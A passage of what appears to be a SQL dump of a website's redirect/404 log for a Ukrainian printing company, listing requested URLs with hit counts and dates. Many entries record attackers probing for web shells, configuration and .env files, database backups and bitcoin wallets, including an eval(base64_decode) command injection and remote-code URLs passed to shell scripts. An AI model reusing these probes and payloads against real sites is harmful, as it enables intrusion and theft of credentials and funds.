00:00:00',301),(20344,'https://ekvatorprint.com.ua/database/',NULL,'','',2,0,'2021-06-09 18:47:37','0000-00-00 00:00:00',301),(20345,'https://ekvatorprint.com.ua/price/mailto:e@ekvatorprint.com.ua',NULL,'','',7,0,'2021-06-09 23:30:44','0000-00-00 00:00:00',301),(20346,'https://ekvatorprint.com.ua/wp-json/wp/v2/users/',NULL,'http://ekvatorprint.com.ua/wp-json/wp/v2/users/','',1,0,'2021-06-10 05:58:39','0000-00-00 00:00:00',301),(20347,'https://ekvatorprint.com.ua/images/kingskrupellos.txt',NULL,'','',1,0,'2021-06-10 20:02:25','0000-00-00 00:00:00',301),(20348,'https://ekvatorprint.com.ua/images/dized.txt',NULL,'','',1,0,'2021-06-11 06:36:35','0000-00-00 00:00:00',301),(20349,'https://ekvatorprint.com.ua/sitemap-index.xml',NULL,'','',1,0,'2021-06-12 02:58:33','0000-00-00 00:00:00',301),(20350,'https://ekvatorprint.com.ua/templates/default/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/templates/default/jQuery-File-Upload/server/php/','',1,0,'2021-06-15 03:24:11','0000-00-00 00:00:00',301),(20351,'https://ekvatorprint.com.ua/admin/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/admin/jQuery-File-Upload/server/php/','',1,0,'2021-06-15 03:52:07','0000-00-00 00:00:00',301),(20352,'https://ekvatorprint.com.ua/plugins/content/fsave/download.php?filename=configuration.php',NULL,'','',1,0,'2021-06-15 14:47:27','0000-00-00 00:00:00',301),(20353,'https://ekvatorprint.com.ua/installer.php',NULL,'','',7,0,'2021-06-15 22:53:13','0000-00-00 00:00:00',301),(20354,'https://ekvatorprint.com.ua/wp-content/backups-dup-lite/',NULL,'','',2,0,'2021-06-16 16:55:17','0000-00-00 00:00:00',301),(20355,'https://ekvatorprint.com.ua/wp-content/backups-dup-pro/',NULL,'','',2,0,'2021-06-16 16:55:17','0000-00-00 00:00:00',301),(20356,'https://ekvatorprint.com.ua/sitemapindex.xml',NULL,'','',1,0,'2021-06-16 16:56:04','0000-00-00 00:00:00',301),(20357,'https://ekvatorprint.com.ua/wp-content/backups-dup-pro/installer.php',NULL,'','',1,0,'2021-06-16 17:11:57','0000-00-00 00:00:00',301),(20358,'https://ekvatorprint.com.ua/mailto:e',NULL,'','',3,0,'2021-06-17 21:33:47','0000-00-00 00:00:00',301),(20359,'https://ekvatorprint.com.ua/js/jquery-file-upload-8.8.5/server/php/',NULL,'http://ekvatorprint.com.ua/js/jquery-file-upload-8.8.5/server/php/','',1,0,'2021-06-18 18:14:51','0000-00-00 00:00:00',301),(20360,'https://ekvatorprint.com.ua/files/index.php?file=tf2rghf.jpg',NULL,'http://www.google.com/','',3,0,'2021-06-19 05:45:32','0000-00-00 00:00:00',301),(20361,'https://ekvatorprint.com.ua/components/com_redmystic/chart/ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2021-06-19 14:53:25','0000-00-00 00:00:00',301),(20362,'https://ekvatorprint.com.ua/index.php?option=com_acymailing&ctrl=frontmails&task=setnewiconshare',NULL,'http://www.google.com/','',3,0,'2021-06-19 14:55:20','0000-00-00 00:00:00',301),(20363,'https://ekvatorprint.com.ua/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',NULL,'www.google.com','',27,0,'2021-06-23 19:35:24','0000-00-00 00:00:00',301),(20364,'https://ekvatorprint.com.ua/sites/all/libraries/elfinder/elfinder.php.html',NULL,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/elfinder.php.html','',2,0,'2021-06-23 21:26:05','0000-00-00 00:00:00',301),(20365,'https://ekvatorprint.com.ua/newsite/',NULL,'','',1,0,'2021-06-25 00:37:04','0000-00-00 00:00:00',301),(20366,'https://ekvatorprint.com.ua/wp-admin/includes/',NULL,'','',4,0,'2021-06-25 03:22:07','0000-00-00 00:00:00',301),(20367,'https://ekvatorprint.com.ua/wp/wp-admin/includes/',NULL,'','',2,0,'2021-06-25 03:22:08','0000-00-00 00:00:00',301),(20368,'https://ekvatorprint.com.ua/wordpress/wp-admin/includes/',NULL,'','',2,0,'2021-06-25 03:22:09','0000-00-00 00:00:00',301),(20369,'https://ekvatorprint.com.ua/blog/wp-admin/includes/',NULL,'','',2,0,'2021-06-25 03:22:11','0000-00-00 00:00:00',301),(20370,'https://ekvatorprint.com.ua/new/wp-admin/includes/',NULL,'','',2,0,'2021-06-25 03:22:12','0000-00-00 00:00:00',301),(20371,'https://ekvatorprint.com.ua/test/wp-admin/includes/',NULL,'','',2,0,'2021-06-25 03:22:13','0000-00-00 00:00:00',301),(20372,'https://ekvatorprint.com.ua/old/wp-admin/includes/',NULL,'','',2,0,'2021-06-25 03:22:14','0000-00-00 00:00:00',301),(20373,'https://ekvatorprint.com.ua/wp-includes',NULL,'www.google.com','',15,0,'2021-06-26 07:23:54','0000-00-00 00:00:00',301),(20374,'https://ekvatorprint.com.ua/administrator/components/com_phocagallery/assets/jcp/picker.js',NULL,'https://ekvatorprint.com.ua/administrator/index.php?option=com_phocagallery&view=phocagalleryt','',1,0,'2021-06-26 10:17:47','0000-00-00 00:00:00',301),(20375,'https://ekvatorprint.com.ua/style2.css',NULL,'','',1,0,'2021-06-26 15:37:52','0000-00-00 00:00:00',301),(20376,'https://ekvatorprint.com.ua/images/style2/bg_bottom.png',NULL,'','',1,0,'2021-06-26 18:05:35','0000-00-00 00:00:00',301),(20377,'https://ekvatorprint.com.ua/media/youtube/pla.js',NULL,'https://ekvatorprint.com.ua/printing-on-canvas','',4,0,'2021-06-26 19:59:21','0000-00-00 00:00:00',301),(20378,'https://ekvatorprint.com.ua/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'http://www.google.com/','',3,0,'2021-06-29 10:01:24','0000-00-00 00:00:00',301),(20379,'https://ekvatorprint.com.ua/components/com_jclassifiedsmanager/helpers/upload.php',NULL,'http://www.google.com/','',1,0,'2021-06-29 10:01:25','0000-00-00 00:00:00',301),(20380,'https://ekvatorprint.com.ua/components/com_jbusinessdirectory/helpers/upload.php',NULL,'http://www.google.com/','',1,0,'2021-07-01 09:13:35','0000-00-00 00:00:00',301),(20381,'https://ekvatorprint.com.ua/components/com_jbusinessdirectory/assets/uploadfile.php',NULL,'http://www.google.com/','',3,0,'2021-07-02 01:46:00','0000-00-00 00:00:00',301),(20382,'https://ekvatorprint.com.ua/video',NULL,'https://ekvatorprint.com.ua/','',3,0,'2021-07-04 09:43:49','0000-00-00 00:00:00',301),(20383,'https://ekvatorprint.com.ua/2021-07-04-09-50-02',NULL,'https://ekvatorprint.com.ua/2021-07-04-09-50-02','',5,0,'2021-07-04 09:59:17','0000-00-00 00:00:00',301),(20384,'https://ekvatorprint.com.ua/ua',NULL,'https://www.google.com.ua/','',1,0,'2021-07-04 11:19:24','0000-00-00 00:00:00',301),(20385,'https://ekvatorprint.com.ua/ru',NULL,'https://www.google.com.ua/','',1,0,'2021-07-04 11:19:25','0000-00-00 00:00:00',301),(20386,'https://ekvatorprint.com.ua/images/holstmishkaphotoredactor_fullscreen.jpg',NULL,'https://ekvatorprint.com.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=43','',5,0,'2021-07-04 13:10:37','0000-00-00 00:00:00',301),(20387,'https://ekvatorprint.com.ua/ludk.php',NULL,'','',2,0,'2021-07-04 17:21:41','0000-00-00 00:00:00',301),(20388,'https://ekvatorprint.com.ua/fonts/roboto-regular.ttf',NULL,'https://ekvatorprint.com.ua/print-flags','',1,0,'2021-07-06 09:27:55','0000-00-00 00:00:00',301),(20389,'https://ekvatorprint.com.ua/wp-cson.php?canshu=1',NULL,'','',2,0,'2021-07-06 18:46:12','0000-00-00 00:00:00',301),(20390,'https://ekvatorprint.com.ua/components/com_jbusinessdirectory/assets/css/morris.css',NULL,'ekvatorprint.com.ua','',1,0,'2021-07-07 10:36:21','0000-00-00 00:00:00',301),(20391,'https://ekvatorprint.com.ua/hetlerx.php',NULL,'','',2,0,'2021-07-07 18:33:22','0000-00-00 00:00:00',301),(20392,'https://ekvatorprint.com.ua/wp-profi1e.php?x=1',NULL,'','',2,0,'2021-07-07 20:16:05','0000-00-00 00:00:00',301),(20393,'https://ekvatorprint.com.ua/axmlprc.php',NULL,'','',2,0,'2021-07-07 23:34:37','0000-00-00 00:00:00',301),(20394,'https://ekvatorprint.com.ua/writebab.php',NULL,'','',2,0,'2021-07-07 23:34:39','0000-00-00 00:00:00',301),(20395,'https://ekvatorprint.com.ua/fotoredaktor/templates/gk_ilife/favicon.ico',NULL,'','',9,0,'2021-07-08 06:03:56','0000-00-00 00:00:00',301),(20396,'https://ekvatorprint.com.ua/rsau.php',NULL,'','',2,0,'2021-07-08 12:14:38','0000-00-00 00:00:00',301),(20397,'https://ekvatorprint.com.ua/wp_honor.php',NULL,'','',2,0,'2021-07-08 15:46:21','0000-00-00 00:00:00',301),(20398,'https://ekvatorprint.com.ua/images/sh3.php?cmd=php -r \'eval(base64_decode(\"zgllkhbpkckqndipow==\"));\'',NULL,'','',2,0,'2021-07-09 06:14:29','0000-00-00 00:00:00',301),(20399,'https://ekvatorprint.com.ua/prv8.php',NULL,'','',2,0,'2021-07-09 19:50:07','0000-00-00 00:00:00',301),(20400,'https://ekvatorprint.com.ua/maps.php',NULL,'','',2,0,'2021-07-09 21:11:37','0000-00-00 00:00:00',301),(20401,'https://ekvatorprint.com.ua/path4.php?testwrite1=1',NULL,'','',2,0,'2021-07-09 22:00:16','0000-00-00 00:00:00',301),(20402,'https://ekvatorprint.com.ua/wpcache.php?_=1',NULL,'','',2,0,'2021-07-10 05:33:12','0000-00-00 00:00:00',301),(20403,'https://ekvatorprint.com.ua/rnnvhs.php',NULL,'','',2,0,'2021-07-10 06:17:06','0000-00-00 00:00:00',301),(20404,'https://ekvatorprint.com.ua/news.php',NULL,'','',2,0,'2021-07-10 08:37:47','0000-00-00 00:00:00',301),(20405,'https://ekvatorprint.com.ua/sockarp.php?login=cmd',NULL,'','',2,0,'2021-07-10 19:13:22','0000-00-00 00:00:00',301),(20406,'https://ekvatorprint.com.ua/backup.bak.php',NULL,'','',2,0,'2021-07-10 19:42:00','0000-00-00 00:00:00',301),(20407,'https://ekvatorprint.com.ua/wp-pas.php',NULL,'','',2,0,'2021-07-10 20:59:03','0000-00-00 00:00:00',301),(20408,'https://ekvatorprint.com.ua/camille.php',NULL,'','',2,0,'2021-07-10 21:08:28','0000-00-00 00:00:00',301),(20409,'https://ekvatorprint.com.ua/phpinfoer.php',NULL,'','',2,0,'2021-07-10 21:14:45','0000-00-00 00:00:00',301),(20410,'https://ekvatorprint.com.ua/asfewfefs.php',NULL,'','',3,0,'2021-07-10 21:25:55','0000-00-00 00:00:00',301),(20411,'https://ekvatorprint.com.ua/xmirpc.php?u=1',NULL,'','',2,0,'2021-07-10 21:53:54','0000-00-00 00:00:00',301),(20412,'https://ekvatorprint.com.ua/random.php',NULL,'','',2,0,'2021-07-10 23:55:48','0000-00-00 00:00:00',301),(20413,'https://ekvatorprint.com.ua/wp-index.php',NULL,'','',2,0,'2021-07-11 00:11:41','0000-00-00 00:00:00',301),(20414,'https://ekvatorprint.com.ua/pols.php',NULL,'','',2,0,'2021-07-11 00:30:49','0000-00-00 00:00:00',301),(20415,'https://ekvatorprint.com.ua/xmlrpc-activate.php',NULL,'','',2,0,'2021-07-11 01:35:14','0000-00-00 00:00:00',301),(20416,'https://ekvatorprint.com.ua/indax.php',NULL,'','',2,0,'2021-07-11 02:14:04','0000-00-00 00:00:00',301),(20417,'https://ekvatorprint.com.ua/comments.php',NULL,'','',2,0,'2021-07-11 05:39:40','0000-00-00 00:00:00',301),(20418,'https://ekvatorprint.com.ua/wp-loadsnew.php',NULL,'','',2,0,'2021-07-11 06:38:06','0000-00-00 00:00:00',301),(20419,'https://ekvatorprint.com.ua/pinfon.php',NULL,'','',2,0,'2021-07-11 08:01:45','0000-00-00 00:00:00',301),(20420,'https://ekvatorprint.com.ua/wp-content/themes/squeezetheme/style.css',NULL,'http://www.google.com/','',2,0,'2021-07-11 08:45:02','0000-00-00 00:00:00',301),(20421,'https://ekvatorprint.com.ua/mobile_detect.php',NULL,'','',2,0,'2021-07-11 09:48:03','0000-00-00 00:00:00',301),(20422,'https://ekvatorprint.com.ua/infos.php',NULL,'','',2,0,'2021-07-11 11:48:03','0000-00-00 00:00:00',301),(20423,'https://ekvatorprint.com.ua/cachee.php',NULL,'','',2,0,'2021-07-11 12:51:25','0000-00-00 00:00:00',301),(20424,'https://ekvatorprint.com.ua/google.php',NULL,'','',2,0,'2021-07-11 13:59:00','0000-00-00 00:00:00',301),(20425,'https://ekvatorprint.com.ua/php.info.php',NULL,'','',2,0,'2021-07-11 14:22:45','0000-00-00 00:00:00',301),(20426,'https://ekvatorprint.com.ua/view.php?check=1',NULL,'','',2,0,'2021-07-11 16:23:45','0000-00-00 00:00:00',301),(20427,'https://ekvatorprint.com.ua/wp-print.php?script=1',NULL,'','',2,0,'2021-07-11 17:28:35','0000-00-00 00:00:00',301),(20428,'https://ekvatorprint.com.ua/bgeiis.php',NULL,'','',2,0,'2021-07-11 19:47:44','0000-00-00 00:00:00',301),(20429,'https://ekvatorprint.com.ua/wp-kidmx.php?script=1',NULL,'','',2,0,'2021-07-11 21:05:40','0000-00-00 00:00:00',301),(20430,'https://ekvatorprint.com.ua/reade.php',NULL,'','',2,0,'2021-07-11 21:11:45','0000-00-00 00:00:00',301),(20431,'https://ekvatorprint.com.ua/keith.php',NULL,'','',2,0,'2021-07-12 02:00:14','0000-00-00 00:00:00',301),(20432,'https://ekvatorprint.com.ua/sfn.php',NULL,'','',2,0,'2021-07-12 03:02:04','0000-00-00 00:00:00',301),(20433,'https://ekvatorprint.com.ua/marvin.php',NULL,'','',2,0,'2021-07-12 03:14:51','0000-00-00 00:00:00',301),(20434,'https://ekvatorprint.com.ua/martina.php',NULL,'','',2,0,'2021-07-12 09:16:14','0000-00-00 00:00:00',301),(20435,'https://ekvatorprint.com.ua/configss.php?check=1',NULL,'','',2,0,'2021-07-12 09:28:25','0000-00-00 00:00:00',301),(20436,'https://ekvatorprint.com.ua/netcat/admin',NULL,'','',1,0,'2021-07-12 13:44:43','0000-00-00 00:00:00',301),(20437,'https://ekvatorprint.com.ua/editor',NULL,'','',1,0,'2021-07-12 13:44:43','0000-00-00 00:00:00',301),(20438,'https://ekvatorprint.com.ua/mg-admin',NULL,'','',1,0,'2021-07-12 13:44:43','0000-00-00 00:00:00',301),(20439,'https://ekvatorprint.com.ua/wp-mosx.php?x=1',NULL,'','',2,0,'2021-07-12 13:55:09','0000-00-00 00:00:00',301),(20440,'https://ekvatorprint.com.ua/assets/images/new_license.php',NULL,'','',2,0,'2021-07-12 17:55:40','0000-00-00 00:00:00',301),(20441,'https://ekvatorprint.com.ua/wp-checking.php',NULL,'','',2,0,'2021-07-12 18:00:00','0000-00-00 00:00:00',301),(20442,'https://ekvatorprint.com.ua/wp-pols.php',NULL,'','',2,0,'2021-07-12 19:19:04','0000-00-00 00:00:00',301),(20443,'https://ekvatorprint.com.ua/cache/mainview/printview.php',NULL,'','',2,0,'2021-07-12 20:55:45','0000-00-00 00:00:00',301),(20444,'https://ekvatorprint.com.ua/ciosan.php',NULL,'','',2,0,'2021-07-12 23:14:09','0000-00-00 00:00:00',301),(20445,'https://ekvatorprint.com.ua/media/plg_jchoptimize/cache/css/7e8ae4d3ccd500ad2f64536cac1e702a.css',NULL,'','',55,0,'2021-07-15 13:19:50','0000-00-00 00:00:00',301),(20446,'https://ekvatorprint.com.ua/assets/plugins/jquery-fileupload/server/php/',NULL,'','',4,0,'2021-07-17 12:31:23','0000-00-00 00:00:00',301),(20447,'https://ekvatorprint.com.ua/timthumb.php',NULL,'','',1,0,'2021-07-17 12:31:50','0000-00-00 00:00:00',301),(20448,'https://ekvatorprint.com.ua/admin/timthumb.php',NULL,'','',1,0,'2021-07-17 12:31:54','0000-00-00 00:00:00',301),(20449,'https://ekvatorprint.com.ua/thumb.php',NULL,'','',1,0,'2021-07-17 12:32:03','0000-00-00 00:00:00',301),(20450,'https://ekvatorprint.com.ua/admin/thumb.php',NULL,'','',1,0,'2021-07-17 12:32:07','0000-00-00 00:00:00',301),(20451,'https://ekvatorprint.com.ua/mysqldump.cnf',NULL,'','',1,0,'2021-07-17 21:39:02','0000-00-00 00:00:00',301),(20452,'https://ekvatorprint.com.ua/config2.php',NULL,'','',1,0,'2021-07-17 23:04:17','0000-00-00 00:00:00',301),(20453,'https://ekvatorprint.com.ua/style.php',NULL,'anonymousfox.co','',49,0,'2021-07-18 00:49:28','0000-00-00 00:00:00',301),(20454,'https://ekvatorprint.com.ua/moduless.php',NULL,'anonymousfox.co','',36,0,'2021-07-18 00:49:30','0000-00-00 00:00:00',301),(20455,'https://ekvatorprint.com.ua/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello',NULL,'anonymousfox.co','',21,0,'2021-07-18 00:49:32','0000-00-00 00:00:00',301),(20456,'https://ekvatorprint.com.ua/wp-content/db_cache.php',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:49:42','0000-00-00 00:00:00',301),(20457,'https://ekvatorprint.com.ua/xmlrp.php?url=https://rentry.co/yu8xc/raw',NULL,'anonymousfox.co','',3,0,'2021-07-18 00:49:46','0000-00-00 00:00:00',301),(20458,'https://ekvatorprint.com.ua/wpindex.php?idb=https://rentry.co/yu8xc/raw',NULL,'anonymousfox.co','',3,0,'2021-07-18 00:49:48','0000-00-00 00:00:00',301),(20459,'https://ekvatorprint.com.ua/larva.php?idb=https://rentry.co/yu8xc/raw',NULL,'anonymousfox.co','',3,0,'2021-07-18 00:49:50','0000-00-00 00:00:00',301),(20460,'https://ekvatorprint.com.ua/th3_err0r.php?php=https://rentry.co/yu8xc/raw',NULL,'anonymousfox.co','',3,0,'2021-07-18 00:49:52','0000-00-00 00:00:00',301),(20461,'https://ekvatorprint.com.ua/alfindex.php',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:49:54','0000-00-00 00:00:00',301),(20462,'https://ekvatorprint.com.ua/wp-booking.php',NULL,'anonymousfox.co','',34,0,'2021-07-18 00:49:57','0000-00-00 00:00:00',301),(20463,'https://ekvatorprint.com.ua/cindex.php',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:49:59','0000-00-00 00:00:00',301),(20464,'https://ekvatorprint.com.ua/wp-content/wp-1ogin_bak.php',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:50:01','0000-00-00 00:00:00',301),(20465,'https://ekvatorprint.com.ua/wp-1ogin_bak.php',NULL,'anonymousfox.co','',31,0,'2021-07-18 00:50:03','0000-00-00 00:00:00',301),(20466,'https://ekvatorprint.com.ua/wp-admin/config.bak.php',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:50:12','0000-00-00 00:00:00',301),(20467,'https://ekvatorprint.com.ua/wp-content/config.bak.php',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:50:14','0000-00-00 00:00:00',301),(20468,'https://ekvatorprint.com.ua/wp-content/themes/config.bak.php',NULL,'anonymousfox.co','',35,0,'2021-07-18 00:50:17','0000-00-00 00:00:00',301),(20469,'https://ekvatorprint.com.ua/wp-content/plugins/config.bak.php',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:50:18','0000-00-00 00:00:00',301),(20470,'https://ekvatorprint.com.ua/wp-content/plugins/ubh/up.php',NULL,'anonymousfox.co','',35,0,'2021-07-18 00:50:22','0000-00-00 00:00:00',301),(20471,'https://ekvatorprint.com.ua/wp-includes/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:50:24','0000-00-00 00:00:00',301),(20472,'https://ekvatorprint.com.ua/wp-content/plugins/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',35,0,'2021-07-18 00:50:27','0000-00-00 00:00:00',301),(20473,'https://ekvatorprint.com.ua/haders.php',NULL,'anonymousfox.co','',19,0,'2021-07-18 00:50:29','0000-00-00 00:00:00',301),(20474,'https://ekvatorprint.com.ua/wp-content/wp-old-index.php?action=login&pass=-1&submit=',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:50:32','0000-00-00 00:00:00',301),(20475,'https://ekvatorprint.com.ua/legion.php',NULL,'anonymousfox.co','',35,0,'2021-07-18 00:50:34','0000-00-00 00:00:00',301),(20476,'https://ekvatorprint.com.ua/wp-content/mu-plugins/db-safe-mode.php',NULL,'anonymousfox.co','',34,0,'2021-07-18 00:50:36','0000-00-00 00:00:00',301),(20477,'https://ekvatorprint.com.ua/wp-includes/lfx.php',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:50:38','0000-00-00 00:00:00',301),(20478,'https://ekvatorprint.com.ua/wp-includes/small.php',NULL,'anonymousfox.co','',19,0,'2021-07-18 00:50:40','0000-00-00 00:00:00',301),(20479,'https://ekvatorprint.com.ua/wp-content/langar.php',NULL,'anonymousfox.co','',21,0,'2021-07-18 00:50:50','0000-00-00 00:00:00',301),(20480,'https://ekvatorprint.com.ua/wp-content/plugins/wpdiscuz/themes/default/style-rtl.css',NULL,'anonymousfox.co','',20,0,'2021-07-18 00:50:57','0000-00-00 00:00:00',301),(20481,'https://ekvatorprint.com.ua/wp-content/plugins/backup_index.php',NULL,'anonymousfox.co','',32,0,'2021-07-18 15:24:53','0000-00-00 00:00:00',301),(20482,'https://ekvatorprint.com.ua/.svn/',NULL,'','',1,0,'2021-07-22 02:49:58','0000-00-00 00:00:00',301),(20483,'https://ekvatorprint.com.ua/oldsite/wp-admin/install.php',NULL,'','',4,0,'2021-07-22 04:34:40','0000-00-00 00:00:00',301),(20484,'https://ekvatorprint.com.ua/c99.php',NULL,'','',8,0,'2021-07-23 03:10:53','0000-00-00 00:00:00',301),(20485,'https://ekvatorprint.com.ua/db_backup.sql',NULL,'','',2,0,'2021-07-23 05:16:17','0000-00-00 00:00:00',301),(20486,'https://ekvatorprint.com.ua/gspweb/account/checkemail?cid=ls&clienttype=dg &email=',NULL,'','',1,0,'2021-07-23 18:06:18','0000-00-00 00:00:00',301),(20487,'https://ekvatorprint.com.ua/media/plg_jchoptimize/cache/css/610060c7bee741aeeeca8d03f3601f6f.css',NULL,'','',5,0,'2021-07-25 10:48:09','0000-00-00 00:00:00',301),(20488,'https://ekvatorprint.com.ua/stag/.env',NULL,'','',4,0,'2021-07-27 01:14:02','0000-00-00 00:00:00',301),(20489,'https://ekvatorprint.com.ua/platform/.env',NULL,'','',4,0,'2021-07-27 01:14:40','0000-00-00 00:00:00',301),(20490,'https://ekvatorprint.com.ua/staging/.env',NULL,'','',4,0,'2021-07-27 01:15:18','0000-00-00 00:00:00',301),(20491,'https://ekvatorprint.com.ua/wp-includes/class-wp-page-cache.php',NULL,'www.google.com','',1,0,'2021-07-28 02:35:41','0000-00-00 00:00:00',301),(20492,'https://ekvatorprint.com.ua/printing-on-canvas/mailto:e@ekvatorprint.com.ua',NULL,'','',1,0,'2021-07-30 11:24:27','0000-00-00 00:00:00',301),(20493,'https://ekvatorprint.com.ua/printing-on-canvas/file:/c:/users/4227~1/appdata/local/temp/website auditor/владелец/tmpreports/484150b4/highlight-css.css',NULL,'','',1,0,'2021-07-31 12:51:15','0000-00-00 00:00:00',301),(20494,'https://ekvatorprint.com.ua/media/plg_jchoptimize/cache/css/2916f771ded527ae66c7caf265b42427.css',NULL,'https://ekvatorprint.com.ua/banner-printing','',2,0,'2021-07-31 12:57:03','0000-00-00 00:00:00',301),(20495,'https://ekvatorprint.com.ua/media/plg_jchoptimize/cache/js/b8c9a750b171086ab274b8eeb1771ee6.js',NULL,'https://ekvatorprint.com.ua/banner-printing','',2,0,'2021-07-31 12:57:04','0000-00-00 00:00:00',301),(20496,'https://ekvatorprint.com.ua/2020/wp-includes/wlwmanifest.xml',NULL,'','',58,0,'2021-08-01 06:05:12','0000-00-00 00:00:00',301),(20497,'https://ekvatorprint.com.ua/images/pechat_foto_na_holste.jpg',NULL,'https://ekvatorprint.com.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=6','',5,0,'2021-08-03 16:18:08','0000-00-00 00:00:00',301),(20498,'https://ekvatorprint.com.ua/images/pechat_foto_na_holste.jpj',NULL,'','',1,0,'2021-08-03 16:20:36','0000-00-00 00:00:00',301),(20499,'https://ekvatorprint.com.ua/images/pechat_foto_na_holste',NULL,'','',2,0,'2021-08-03 16:21:22','0000-00-00 00:00:00',301),(20500,'https://ekvatorprint.com.ua/__media__/js/netsoltrademark.php?d=i4put1a.com',NULL,'','',1,0,'2021-08-03 23:48:52','0000-00-00 00:00:00',301),(20501,'https://ekvatorprint.com.ua/download.php?file=bitcoin/wallet.dat',NULL,'','',1,0,'2021-08-04 07:51:03','0000-00-00 00:00:00',301),(20502,'https://ekvatorprint.com.ua/download.php?file=wallet.dat',NULL,'','',1,0,'2021-08-04 07:51:08','0000-00-00 00:00:00',301),(20503,'https://ekvatorprint.com.ua/bitcoin_datadir/wallet.dat',NULL,'','',1,0,'2021-08-04 07:51:20','0000-00-00 00:00:00',301),(20504,'https://ekvatorprint.com.ua/data/wallet.dat',NULL,'','',1,0,'2021-08-04 07:51:24','0000-00-00 00:00:00',301),(20505,'https://ekvatorprint.com.ua/wallet - copy.dat',NULL,'','',1,0,'2021-08-04 07:51:29','0000-00-00 00:00:00',301),(20506,'https://ekvatorprint.com.ua/btc/',NULL,'','',1,0,'2021-08-04 07:51:33','0000-00-00 00:00:00',301),(20507,'https://ekvatorprint.com.ua/bitcoin datadir/wallet.dat',NULL,'','',1,0,'2021-08-04 07:51:38','0000-00-00 00:00:00',301),(20508,'https://ekvatorprint.com.ua/datadir/wallet.dat',NULL,'','',1,0,'2021-08-04 07:51:42','0000-00-00 00:00:00',301),(20509,'https://ekvatorprint.com.ua/bitcoindata/wallet.dat',NULL,'','',2,0,'2021-08-04 07:51:45','0000-00-00 00:00:00',301),(20510,'https://ekvatorprint.com.ua/btc/wallet.dat',NULL,'','',1,0,'2021-08-04 07:51:54','0000-00-00 00:00:00',301),(20511,'https://ekvatorprint.com.ua/bitcoin_data/wallet.dat',NULL,'','',1,0,'2021-08-04 07:52:02','0000-00-00 00:00:00',301),(20512,'https://ekvatorprint.com.ua/home/root/.bitcoin/wallet.dat',NULL,'','',1,0,'2021-08-04 07:52:17','0000-00-00 00:00:00',301),(20513,'https://ekvatorprint.com.ua/home/ubuntu/.bitcoin/wallet.dat',NULL,'','',1,0,'2021-08-04 07:52:20','0000-00-00 00:00:00',301),(20514,'https://ekvatorprint.com.ua/backups/bitcoin.dat',NULL,'','',1,0,'2021-08-04 07:52:25','0000-00-00 00:00:00',301),(20515,'https://ekvatorprint.com.ua/home/.bitcoin/wallet.dat',NULL,'','',1,0,'2021-08-04 07:52:29','0000-00-00 00:00:00',301),(20516,'https://ekvatorprint.com.ua/backup/bitcoin_wallet.dat',NULL,'','',1,0,'2021-08-04 07:52:46','0000-00-00 00:00:00',301),(20517,'https://ekvatorprint.com.ua/ekvatorprint_wallet.dat.zip',NULL,'','',1,0,'2021-08-04 07:54:06','0000-00-00 00:00:00',301),(20518,'https://ekvatorprint.com.ua/wallets/wallet.dat',NULL,'','',1,0,'2021-08-04 07:54:14','0000-00-00 00:00:00',301),(20519,'https://ekvatorprint.com.ua/wallet/bitcoin/wallet.dat',NULL,'','',1,0,'2021-08-04 07:54:18','0000-00-00 00:00:00',301),(20520,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_wallet.dat.zip',NULL,'','',1,0,'2021-08-04 07:54:25','0000-00-00 00:00:00',301),(20521,'https://ekvatorprint.com.ua/wallets/bitcoin/wallet.dat',NULL,'','',1,0,'2021-08-04 07:54:30','0000-00-00 00:00:00',301),(20522,'https://ekvatorprint.com.ua/ekvatorprint.dat.zip',NULL,'','',1,0,'2021-08-04 07:54:34','0000-00-00 00:00:00',301),(20523,'https://ekvatorprint.com.ua/wallet/btc/wallet.dat',NULL,'','',1,0,'2021-08-04 07:54:39','0000-00-00 00:00:00',301),(20524,'https://ekvatorprint.com.ua/wallets/btc/wallet.dat',NULL,'','',1,0,'2021-08-04 07:54:43','0000-00-00 00:00:00',301),(20525,'https://ekvatorprint.com.ua/backup/wallet - copy.dat',NULL,'','',1,0,'2021-08-04 07:54:48','0000-00-00 00:00:00',301),(20526,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.dat.zip',NULL,'','',1,0,'2021-08-04 07:55:05','0000-00-00 00:00:00',301),(20527,'https://ekvatorprint.com.ua/wallet_backup.dat.zip',NULL,'','',1,0,'2021-08-04 07:55:11','0000-00-00 00:00:00',301),(20528,'https://ekvatorprint.com.ua/wallet.dat.zip',NULL,'','',1,0,'2021-08-04 07:55:15','0000-00-00 00:00:00',301),(20529,'https://ekvatorprint.com.ua/bitcoin.dat',NULL,'','',1,0,'2021-08-04 07:55:21','0000-00-00 00:00:00',301),(20530,'https://ekvatorprint.com.ua/_wallet.dat',NULL,'','',1,0,'2021-08-04 07:55:30','0000-00-00 00:00:00',301),(20531,'https://ekvatorprint.com.ua/wallet_backup.dat',NULL,'','',1,0,'2021-08-04 07:55:34','0000-00-00 00:00:00',301),(20532,'https://ekvatorprint.com.ua/bitcoin_wallet.dat',NULL,'','',1,0,'2021-08-04 07:55:39','0000-00-00 00:00:00',301),(20533,'https://ekvatorprint.com.ua/bitcoin.dat.zip',NULL,'','',1,0,'2021-08-04 07:55:43','0000-00-00 00:00:00',301),(20534,'https://ekvatorprint.com.ua/backups/wallet.zip',NULL,'','',1,0,'2021-08-04 07:55:49','0000-00-00 00:00:00',301),(20535,'https://ekvatorprint.com.ua/backup/wallet.zip',NULL,'','',1,0,'2021-08-04 07:55:55','0000-00-00 